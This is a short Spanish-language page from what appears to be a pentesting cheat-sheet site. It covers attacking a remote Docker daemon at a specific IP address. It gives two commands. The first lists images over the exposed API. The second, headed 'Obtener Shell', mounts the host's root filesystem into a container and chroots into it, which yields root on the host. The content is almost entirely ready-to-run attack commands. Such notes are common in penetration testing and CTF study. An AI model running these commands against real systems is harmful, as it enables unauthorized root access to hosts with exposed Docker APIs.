> For the complete documentation index, see [llms.txt](https://cs.desdes.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cs.desdes.xyz/miscelanio/docker.md).

# Docker

### Docker Remoto <a href="#docker-remoto" id="docker-remoto"></a>

#### Conectarse:

```
docker -H 10.10.45.169 images
```

#### Obtener Shell:

```
docker -H 10.10.45.169 run -v /:/mnt --rm -it nginx chroot /mnt bash
```
